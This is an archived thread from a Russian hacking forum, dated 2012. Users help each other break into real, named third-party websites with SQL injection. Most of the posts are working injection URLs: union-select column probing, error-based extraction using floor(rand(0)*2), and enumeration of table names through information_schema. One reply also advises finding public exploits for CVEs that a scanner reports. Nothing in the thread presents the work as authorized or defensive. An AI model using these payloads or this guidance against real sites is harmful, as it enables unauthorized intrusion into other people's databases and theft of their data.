ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

05.02.2012, 17:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 7275
Репутация:
0
|
|
Можно ли как-то использовать данные уязвимости?

|
|
|
|

05.02.2012, 18:21
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
2Tr[1]x,
Можно.
P.S. Что за прога?
|
|
|
|

05.02.2012, 18:44
|
|
Guest
Сообщений: n/a
Провел на форуме: 23576
Репутация:
-1
|
|
Сообщение от Ereee
Ereee said:
2Tr[1]x
,
Можно.
P.S. Что за прога?
программа Xspider
|
|
|
|

05.02.2012, 18:46
|
|
Guest
Сообщений: n/a
Провел на форуме: 7275
Репутация:
0
|
|
Ereee, не подскажешь как именно?
|
|
|
|

05.02.2012, 18:47
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
Сообщение от Tr[1
x"]
Tr[1]x said:
Ereee
, не подскажешь как именно?
Обычно сканеры показывают CVE. По нем ищи сплойт в гугле.
|
|
|
|

05.02.2012, 20:30
|
|
Guest
Сообщений: n/a
Провел на форуме: 344922
Репутация:
75
|
|
ТАксс, пару вопросов
Сообщение от None
http://kvikmyndir.is/frettir/frett/?id=104374
не могу вывести данные через еррор, кто что подскажет
второе
Сообщение от None
http://www.eeagrants.lv/?id=-10+limit+0,0+union+select+version%28%29,version%28 %29,version%28%29--+
Сообщение от None
http://crumbweb.org/getInterviewDetail.php?id=-11+limit+0,0+union+select+version%28%29,version%28 %29,version%28%29--+
в обоих случаях стольбы подобрал но на екран ничего не выводит, крутить как блинд не избежно или всётаки ожно чтонибуть сделать?
и наконец третее
Сообщение от None
http://www.57productions.com/article_reader.php?id=11
что в запрос не подставлю постоянно вылетает только ошибка и никакого вывода, как быть?
|
|
|
|

05.02.2012, 20:45
|
|
Guest
Сообщений: n/a
Провел на форуме: 45485
Репутация:
1
|
|
qaz,
третье - слепая
вторая - слепая, попробуй что-нибудь сделать.
|
|
|
|

05.02.2012, 20:49
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
qaz
первый
http://kvikmyndir.is/frettir/frett/?id=104374,(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a))--+
второй наверное слепая
3
http://www.57productions.com/article_reader.php?id=11+or+1+group+by+concat(vers ion(),floor(rand(0)*2))having+min(0)+or+1--+
третья ветка, поэтому юнион не катит
|
|
|

05.02.2012, 21:00
|
|
Guest
Сообщений: n/a
Провел на форуме: 344922
Репутация:
75
|
|
Сообщение от Konqi
Konqi said:
qaz
первый
http://kvikmyndir.is/frettir/frett/?id=104374,(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a))--+
о, спасибо, вот прблемка, хотел перебрать таблици, на какой бы лимит не подставил серовно показывает одну и туже таблицу
Сообщение от None
http://kvikmyndir.is/frettir/frett/?id=104374,%28select%201%20from%28select%20count%2 8*%29,concat%28table_name,0x00,floor%28rand%280%29 *2%29%29x%20from%20information_schema.tables%20gro up%20by%20x%20limit%202,1%29a%29%29--+
может я не туда его влепил?
|
|
|
|

05.02.2012, 21:03
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от qaz
qaz said:
о, спасибо, вот прблемка, хотел перебрать таблици, на какой бы лимит не подставил серовно показывает одну и туже таблицу
может я не туда его влепил?
http://kvikmyndir.is/frettir/frett/?id=104374,(select 1 from(select count(*),concat((select+table_name+from+informatio n_schema.tables+where+table_schema=database()+ limit+0,1),floor(rand(0)*2))x from information_schema.tables group by x)a))--+
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|